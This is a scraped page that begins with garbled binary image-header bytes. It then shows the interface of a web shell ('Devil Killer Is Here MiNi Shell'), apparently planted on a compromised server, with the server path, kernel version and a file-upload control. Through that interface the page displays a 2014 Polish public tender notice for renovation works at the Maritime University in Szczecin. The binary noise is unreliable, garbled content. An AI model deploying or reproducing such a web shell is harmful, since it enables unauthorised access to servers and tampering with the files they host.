JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140626/214022-N-2014.html

<p class="kh_header"><b>Szczecin: Przebudowa fragmentu 1 piętra wraz z niezbędną infrastrukturą techniczną oraz konserwacja klimatyzacji, wentylacji, systemów SWiN, CCTV, modernizacja toalet oraz modernizacja dachu w budynku dydaktycznym nr 1 Akademii Morskiej w Szczecinie przy ul. Willowej 2- 4 (nr działki 4/14  obr. 3018 Nad Odrą 18) na potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony  Środowiska w podziale na 3 zadania - AR/83/07/2014</b><br>
<b>Numer ogłoszenia: 214022 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Morska w Szczecinie , ul. Wały Chrobrego 1/2, 70-500 Szczecin, woj. zachodniopomorskie, tel. 91 4809400, faks 91 4809575.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.am.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa fragmentu 1 piętra wraz z niezbędną infrastrukturą techniczną oraz konserwacja klimatyzacji, wentylacji, systemów SWiN, CCTV, modernizacja toalet oraz modernizacja dachu w budynku dydaktycznym nr 1 Akademii Morskiej w Szczecinie przy ul. Willowej 2- 4 (nr działki 4/14  obr. 3018 Nad Odrą 18) na potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony  Środowiska w podziale na 3 zadania - AR/83/07/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Przebudowa fragmentu 1 piętra wraz z niezbędną infrastrukturą techniczną oraz konserwacja klimatyzacji, wentylacji, systemów SWiN, CCTV, modernizacja toalet oraz modernizacja dachu w budynku dydaktycznym nr 1 Akademii Morskiej w Szczecinie przy ul. Willowej 2- 4 (nr działki 4/14  obr. 3018 Nad Odrą 18) na potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony  Środowiska - w podziale na 3 zadania.
zadanie 1 - Przebudowa fragmentu I piętra w budynku Dydaktycznym nr 1 wraz z niezbędną infrastrukturą techniczną oraz konserwacja klimatyzacji, wentylacji, systemów SWiN, CCTV pod potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska; 
zadanie 2 - Modernizacja toalet w budynku Dydaktycznym nr 1 pod potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska;
zadanie 3 - Modernizacja dachu budynku Dydaktycznego nr 1 pod potrzeby projektu -Utworzenie Centrum Badania Paliw, Cieczy Roboczych i Ochrony Środowiska;
Zadanie współfinansowane będzie przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013.	
W przypadku nieudzielenia dofinansowania projektu z budżetu Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego  na lata 2007-2013, Zamawiający zastrzega możliwość unieważnienia procedury przetargowej (art. 93 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. PZP z późniejszymi zmianami);
Przedmiotem Zamówienia są między innymi:
1.1. roboty budowlane - roboty rozbiórkowe i demontażowe, wyburzenia ścian, przebijanie otworów, roboty malarskie; roboty tynkarskie, wykonanie posadzek, sufity podwieszane, zabudowy z płyt kartonowo - gipsowych, wymiana stolarki okiennej i drzwiowej, rozbiórka pokrycia papowego dachu, obróbek blacharskich, pokrycie dachu papą termozgrzewalną, wykonanie obróbek blacharskich, montaż rur spustowych, rynien, itd.  
1.2. roboty sanitarne - demontaż istniejących instalacji wodnych, kanalizacyjnych, centralnego ogrzewania, roboty w zakresie montażu instalacji wentylacyjnej i klimatyzacyjnej; montażu nowych grzejników płytowych, montażu nowej instalacji  centralnego ogrzewania, wodnych, kanalizacyjnych, wykonanie prób szczelności instalacji c.o., itd.
1.3. roboty elektryczne - demontaż istniejących tras i linii kablowych, wykonanie instalacji elektrycznych, ogólnych, gniazdowych, oświetlenia, oświetlenia ewakuacyjnego, prowadzenie tras kablowych, wykonanie WLZ i tablic rozdzielczych, zasilenie centrali wentylacyjnej, klimatyzacyjnej, multimedialnej (światłowód), teleinformatycznej; zasilanie SWiN, badania i pomiary itd.
1.4. instalacje teleinformatyczne - wykonanie tras kablowych, układanie instalacji teleinformatycznej, wyposażenie GPD i lokalnych punktów dostępowych w niezbędne wyposażenie i urządzenia aktywne i pasywne, dostawa i montaż centrali telefonicznej wraz z aparatami telefonicznymi itd.,
1.5. instalacje teletechniczne - wykonanie tras kablowych, prowadzenie instalacji, montaż urządzeń  dla instalacji SWiN, CCTV, itd.
1.6. konserwacja zamontowanych instalacji i urządzeń wentylacji i klimatyzacji przez okres 36 miesięcy od daty odbioru końcowego robót bez zastrzeżeń.
1.7. konserwacja systemów: sygnalizacji włamania i napadu (SWiN), telewizji przemysłowej CCTV przez okres 36 miesięcy od odbioru końcowego robót bez zastrzeżeń.
Szczegółowy opis przedmiotu zamówienia zawierają: 
Zadanie nr 1:
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-1 ÷ 9-4 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-1 ÷ 10-4 do SIWZ), Projekty wykonawcze (zał. nr 11-1 ÷ 11-5 do SIWZ).
Zadanie nr 2:
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-6 ÷ 9-8 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-6 ÷ 10-8 do SIWZ), Projekty wykonawcze (zał. nr 11-6 do SIWZ).
Zadanie nr 3:
Specyfikacja Techniczna Wykonania i Odbioru Robót (zał. nr 9-5 do SIWZ), Przedmiary Robót - pomocniczo (zał. nr 10-5 do SIWZ).
2. Podane przez Zamawiającego w opisie przedmiotu zamówienia ewentualne nazwy (znaki towarowe mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym zamawiający dopuszcza składanie ofert równoważnych na podstawie art. 30 ust. 5 ustawy - Prawo Zamówień Publicznych.
3. Zamawiający informuje, że istnieje możliwość przeprowadzenia wizji lokalnej na miejscu. Wykonawcy, którzy są zainteresowani przeprowadzeniem w/w wizji lokalnej w celu zapoznania się z obiektem, zobowiązani są zgłosić chęć uczestniczenia w wizji lokalnej do Działu Inwestycji i Rozwoju w formie pisemnej, lub faksowej (nr faksu 91 4809 748), lub za pośrednictwem poczty e-mail na adres: ar@am.szczecin.pl do dnia 03.07.2014 r. do godz. 10.00. O terminie przeprowadzenia wizji lokalnej Wykonawcy chętni do udziału w niej zostaną poinformowani pisemnie, faksem lub e-mailem.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.20.00-1, 45.31.12.00-2, 45.33.12.00-8, 45.33.11.00-7, 45.33.00.00-9, 45.26.19.10-6, 45.26.10.00-4, 45.26.25.00-6, 45.26.13.00-7, 45.41.00.00-4, 45.43.00.00-0, 45.42.11.00-5, 45.44.21.00-8, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wymagane wadium określono w stosunku do wartości zamówienia i wynosi odpowiednio: Dla zadania nr 1: 26 500,00 zł (słownie złotych: dwadzieścia sześć tysięcy pięćset 00/100) Dla zadania nr 2: 2 800,00 zł (słownie złotych: dwa tysiące osiemset 00/100) Dla zadania nr 3: 6 200,00 zł (słownie złotych: sześć tysięcy dwieście 00/100)
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
-  pieniądzu na konto Zamawiającego: 16 1240 1864 1111 0000 2205 5615 z dopiskiem na przelewie: Wadium do przetargu nr AR/83/07/2014 na: Przebudowa fragmentu 1 piętra przy ul. Willowej 2- 4  - zadanie nr 
- poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancji bankowych; 
- gwarancji ubezpieczeniowych; 
-  poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). 
3. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. 
4. W przypadku wnoszenia wadium w innej formie niż pieniężna, Wykonawca dołącza do oferty oryginalny dokument wadialny. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie wniosą wadium przed upływem terminu składania ofert.
5. Wadium wniesione w formie innej niż pieniężna winno obowiązywać od dnia składania ofert (a nie od dnia następnego) przez cały okres związania ofertą, zgodnie z art. 85 ustawy PZP.
6. W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium zawierające oświadczenie, że zapłaci całą kwotę wadium w przypadku zaistnienia okoliczności, o którym mowa w art. 46 ust 4a i 5 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie:
a) Zadanie 1: co najmniej 2 robót budowlanych związanych z budową, lub przebudową, lub rozbudową lub modernizacją budynku o wartości nie niższej niż 1 500 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie);
b) Zadanie nr 2: co najmniej 2 robót budowlanych związanych  z budową, lub przebudową, lub rozbudową lub modernizacją pomieszczeń o wartości nie niższej niż 100 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie);
c) Zadanie nr 3: co najmniej 2 robót budowlanych związanych z wykonaniem pokryć przy wykorzystaniu materiałów bitumicznych o wartości nie niższej niż 200 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie);
2. Ocena spełniania powyższych warunków nastąpi w następujący sposób:
Zamawiający zbada obecność i prawidłowość każdego wymaganego dokumentu
i oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę oświadczeń lub dokumentów załączonych do oferty zgodnie z formułą: spełnia / nie spełnia.
3. W rozdziale IX SIWZ dotyczącym wykazu oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału 
w postępowaniu, Zamawiający szczegółowo wskazuje, jakich oświadczeń lub dokumentów żąda od Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował:
a) Zadanie nr 1: co najmniej 1 (jedną) osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późniejszymi zmianami) do pełnienia funkcji:
- kierownika budowy o specjalności: konstrukcyjno-budowlanej 
lub równoważnej, posiadającą minimum 5-letnie doświadczenie zawodowe na budowie;
-   kierownika robót o specjalności:
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważnej posiadającą minimum 5-letnie doświadczenie zawodowe na budowie,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  lub równoważnej posiadającą minimum 5-letnie doświadczenie zawodowe na budowie,
- telekomunikacyjnej lub równoważnej posiadającą minimum 5-letnie doświadczenie zawodowe na budowie,
b)  Zadanie nr 2: co najmniej 1 (jedną) osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późniejszymi zmianami) do pełnienia funkcji:
- kierownika robót o specjalności: konstrukcyjno-budowlanej lub równoważnej, posiadającą minimum 5-letnie doświadczenie zawodowe na budowie;
-   kierownika robót o specjalności:
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważnej posiadającą minimum 5-letnie doświadczenie zawodowe na budowie,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  lub równoważnej posiadającą minimum 5-letnie doświadczenie zawodowe na budowie,
c) Zadanie nr 3: co najmniej 1 (jedną) osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późniejszymi zmianami) do pełnienia funkcji:
- kierownika robót o specjalności: konstrukcyjno-budowlanej lub równoważnej, posiadającą minimum 5-letnie doświadczenie zawodowe na budowie;
które będą uczestniczyć w wykonywaniu zamówienia
2. Ocena spełniania powyższych warunków nastąpi w następujący sposób:
Zamawiający zbada obecność i prawidłowość każdego wymaganego dokumentu
i oświadczenia, a także czy wymagany dokument i oświadczenie potwierdza spełnianie warunku nie później niż na dzień składania ofert. Zamawiający dokona formalnej oceny spełniania warunków udziału w postępowaniu w oparciu o analizę oświadczeń lub dokumentów załączonych do oferty zgodnie z formułą: spełnia / nie spełnia.
3. W rozdziale IX SIWZ dotyczącym wykazu oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału 
w postępowaniu, Zamawiający szczegółowo wskazuje, jakich oświadczeń lub dokumentów żąda od Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>a) Zadanie nr 1 - co najmniej 2 roboty budowlane związane z budową, lub przebudową, lub rozbudową lub modernizacją budynku o wartości nie niższej niż 1 500 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
b) Zadanie nr 2 - co najmniej 2 roboty budowlane związane z budową, lub przebudową, lub rozbudową lub modernizacją pomieszczeń o wartości nie niższej niż 100 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie);
c) Zadanie nr 3 - co najmniej 2 roboty budowlane związanych z wykonaniem pokryć przy wykorzystaniu materiałów bitumicznych o wartości nie niższej niż 200 000,00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie);z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów (dokumentów) określających, czy wskazane ww. wykazie roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy stanowi zał. nr 8 do niniejszej SIWZ.
2. Zamawiający informuje, że przewiduje możliwości zmiany umowy. Zmiany zawartej umowy mogą nastąpić w formie aneksu w następujących przypadkach:
1) ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia przez Wykonawcę;
2) wystąpią okoliczności skutkujące potrzebą zmiany terminu realizacji zamówienia takie jak: 
a) zmiana stanu prawnego w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany terminu,
b) brak dostępu do pomieszczeń, w których przewidziano prowadzenie prac 
z przyczyn niezależnych od Wykonawcy, 
c) gdy wystąpią  przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej) i inne zdarzenia, których przyczyny nie leżą po żadnej ze stron umowy, takie jak: nadzwyczajne zjawiska przyrody (między innymi trzęsienia ziemi, powodzie, huragany), zdarzenia wywołane przez człowieka, np. działania wojenne czy gwałtowne rozruchy oraz akty władzy publicznej (fait du prince), którym należy się podporządkować, a także inne niemożliwe do przewidzenia przyczyny techniczne,
d) opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać innemu Wykonawcy, Podmiotowi działającemu za zgodą Zamawiającego, 
4) zmiana numeru rachunku bankowego Wykonawcy,
5) zmiana wynagrodzenia, o którym mowa w § 7 ust. 1 wzoru umowy związana 
z koniecznością rezygnacji przez Zamawiającego z wykonania części zamówienia o wartość wynikającą z kosztorysów będących załącznikami nr 6-1÷ 6-8 do umowy.
6) gdy są korzystne dla zamawiającego.
3. Gdy nastąpi ustawowa zmiana stawki podatku od towarów i usług VAT umowa nie ulegnie zmianie w zakresie wysokości ceny brutto. 
4. Strony dopuszczają możliwość zmian w zakresie osoby zdolnej do wykonania przedmiotu umowy na zasadach określonych w § 5 ust. 3-5 umowy bez konieczności sporządzania aneksu.
5. Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
